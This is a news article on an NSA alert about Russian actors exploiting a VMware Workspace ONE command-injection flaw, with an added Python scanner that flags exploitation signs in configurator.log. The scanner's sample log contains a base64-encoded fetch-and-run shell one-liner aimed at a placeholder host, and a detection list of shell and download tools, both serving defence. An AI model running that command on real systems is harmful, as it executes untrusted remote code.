
NSA Warns Nation-State Actors Exploiting Remote Work Endpoints

Russian nation-state threat actors are using stolen credentials to actively exploit a recently disclosed vulnerability in several VMware Workspace ONE identity and access products used to support remote work.

The NSA released an alert warning all organizations to apply the recommended mitigations for a vulnerability in certain VMware Workspace ONE products. Nation-state actors with ties to Russia are actively exploiting these remote work platforms to gain access to enterprise networks.

Disclosed in late November, the command-injection vulnerability, CVE-2020-4006, is found in the administrative configurator of certain versions of VMware Workspace ONE Access, Workspace ONE Access Connector, Identity Manager, and Identity Manager Connector.

If exploited, a remote attacker with network access to the administrative configurator on port 8443 and a valid password for its admin account could execute commands with unrestricted privileges on the underlying operating system.

VMware rated the vulnerability as "important" severity with a CVSSv3 base score of 7.2 out of 10. Officials further noted that vRealize Suite Lifecycle Manager and VMware Cloud Foundation embed some of the affected components, so the mitigations should be applied to those products as well.

“This account is internal to the impacted products and a password is set at the time of deployment,” VMware officials explained in the disclosure. “A malicious actor must possess this password to attempt to exploit CVE-2020-4006.”

However, the Department of Homeland Security and the NSA warn that threat actors are already exploiting the vulnerability with stolen credentials to gain access to protected data on the affected systems.

In the intrusions NSA observed, the attackers used the command injection to install a web shell on the appliance, then used that foothold to generate forged credentials in the form of SAML authentication assertions, which they sent to Microsoft Active Directory Federation Services (ADFS). Because ADFS trusted the assertions, the attackers were granted access to protected data.

NSA and DHS urged entities to apply the patch VMware released on December 3 to avoid falling victim. If the software cannot be updated, organizations should at minimum ensure the configurator admin account has a strong, unique password to lower the risk of exploitation.

“Setting the password to a strong unique password would make it more difficult to exploit, but would likely not mitigate an existing compromise,” the alert warned. “It is critical when running products that perform authentication that the server and all the services that depend on it are properly configured for secure operation and integration.” 

“Otherwise, SAML assertions could be forged, granting access to numerous resources,” it added. “If integrating authentication servers with ADFS, NSA recommends following Microsoft’s best practices, especially for securing SAML assertions and requiring multi-factor authentication.”

Administrators should also ensure the web-based management interface is not reachable from the internet, review and harden configurations, and monitor federated authentication providers.

Before the patch was available, entities were encouraged to apply a workaround for the configurator hosted on port 8443, which the NSA alert also references. The workaround disables the configurator service, which blocks the critical portions of the observed malicious activity.

The impact is limited to the functionality that service provides: “configurator-managed setting changes will not be possible while the workaround is in place,” and most of the system diagnostics dashboard will no longer be displayed.

Notably, network-based indicators are unlikely to detect exploitation of the flaw, because the malicious activity occurs entirely inside the TLS-encrypted connection to the web interface.

Instead, administrators should review server logs, which may indicate that the VMware flaw was exploited, such as “the presence of an ‘exit’ statement followed by any 3-digit number, such as ‘exit 123’, within the configurator.log.”

“Other commands along with encoded scripts may also be present,” according to the alert. “If such logs are detected, incident response actions should be followed. Additional investigation of the server, especially for web shell malware, is recommended.”
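The log review the alert describes can be scripted. The following is an added example, not NSA's or VMware's tooling: it scans configurator.log lines for the stated indicator (an `exit` statement followed by any three-digit number) and applies a simple heuristic for the encoded scripts the alert says may also be present. The log line layout and the sample lines are constructed for illustration; the base64 heuristic is an assumption of this example, not an NSA rule.

```python
"""Added example (not NSA's or VMware's code): scan a Workspace ONE Access
configurator.log for the CVE-2020-4006 exploitation indicator NSA describes,
an 'exit' statement followed by any 3-digit number, plus a simple heuristic for
the "encoded scripts" the alert says may also be present.

Assumptions: the log line layout below is invented for illustration, and the
sample lines are constructed, not captured from a real appliance.
"""
import base64
import re
from typing import Dict, Iterable, List

# NSA's stated indicator: the literal word 'exit' followed by exactly three digits.
# 'exit 0' or 'exit 1234' do not match, which is what "any 3-digit number" implies.
EXIT_INDICATOR = re.compile(r"\bexit\s+\d{3}\b")

# Heuristic (an assumption, not an NSA rule): a run of base64 text that decodes to
# printable content containing shell-like keywords is treated as an encoded script.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
SCRIPT_KEYWORDS = ("bash", "/bin/sh", "curl", "wget", "python", "base64", "eval")


def decodes_to_script(token: str) -> bool:
    """Return True if token is valid base64 for printable text with shell keywords."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except Exception:  # bad padding, non-base64 characters or non-UTF-8 bytes
        return False
    if not all(ch.isprintable() or ch.isspace() for ch in text):
        return False
    lowered = text.lower()
    return any(keyword in lowered for keyword in SCRIPT_KEYWORDS)


def scan_configurator_log(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one finding per indicator hit: {"line": n, "reason": ..., "text": ...}."""
    findings: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        if EXIT_INDICATOR.search(line):
            findings.append({"line": number, "reason": "exit-statement", "text": line})
        for match in B64_RUN.finditer(line):
            if decodes_to_script(match.group(0)):
                findings.append({"line": number, "reason": "encoded-script", "text": line})
                break  # one encoded-script finding per line is enough
    return findings


# Constructed sample: a benign startup line, a login, the NSA 'exit NNN' indicator,
# and a base64-wrapped one-liner of the kind a web shell drop might leave behind.
ENCODED_PAYLOAD = base64.b64encode(
    b"bash -c 'curl http://198.51.100.7/x.sh | sh'"  # 198.51.100.0/24 is documentation space
).decode("ascii")

SAMPLE_LOG = [
    "2020-12-07 10:02:11,405 INFO  [main] Configurator started on port 8443",
    "2020-12-07 10:03:45,110 INFO  [http-nio-8443-exec-3] Admin login successful",
    "2020-12-07 10:04:02,332 INFO  [http-nio-8443-exec-3] exit 123",
    f"2020-12-07 10:04:09,871 INFO  [http-nio-8443-exec-3] echo {ENCODED_PAYLOAD} | base64 -d | sh",
    "2020-12-07 10:05:30,002 INFO  [main] Applied setting sessionTimeout=30",
]

if __name__ == "__main__":
    for finding in scan_configurator_log(SAMPLE_LOG):
        print(f"line {finding['line']}: {finding['reason']}: {finding['text']}")
```

Run against the constructed sample, the scanner flags line 3 for the `exit 123` indicator and line 4 for the encoded one-liner, and ignores the benign lines. Any hit is a trigger for the incident response steps the alert calls for, including a search of the appliance for web shell malware; the heuristic is deliberately narrow to keep false positives low rather than to catch every obfuscation.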

“Regularly monitor authentication logs for anomalous authentications, especially successful ones that leverage established trusts but that come from unusual addresses or contain unusual properties,” it added.

Because exploitation requires password-authenticated access to the TLS-encrypted management interface, NSA recommended that system administrators limit access to that interface to a small set of known management systems and block direct access from the internet.

The NSA alert follows several other reports that nation-state actors are targeting healthcare entities and others tied to the COVID-19 response with phishing and other cyberattacks. A previous alert showed Russian threat actors actively targeting vulnerable email systems.

A recent alert warned that Chinese nation-state threat actors were targeting organizations through unpatched vulnerabilities, spotlighting the need to remediate these endpoint flaws to prevent falling victim to an attack.
